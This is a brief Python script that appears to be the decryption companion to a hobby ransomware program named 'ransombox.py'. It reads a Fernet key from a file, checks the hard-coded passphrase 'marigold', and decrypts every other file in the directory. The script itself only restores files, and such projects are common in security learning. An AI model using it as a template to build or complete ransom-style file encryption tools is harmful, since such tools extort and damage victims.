#!/usr/bin/env python3

import os
from cryptography.fernet import Fernet

files = []

for file in os.listdir():
        if file == "ransombox.py" or file == "keys.key" or file == "decrypt.py":
                continue
        if os.path.isfile(file):
                files.append(file)

print(files)


with open("keys.key", "rb") as key:
        secretkey = key.read()

secretphrase = "marigold"

user_phrase = input("Enter the Decrypter key/n")

if user_phrase == secretphrase:
        for file in files:
                with open(file, "rb") as thefile:
                        contents = thefile.read()
                contents_decrypted = Fernet(secretkey).decrypt(contents)
                with open(file, "wb") as thefile:
                        thefile.write(contents_decrypted)
                print("Your files are now decrypted")
else:
        print("Sorry,Wrong key")
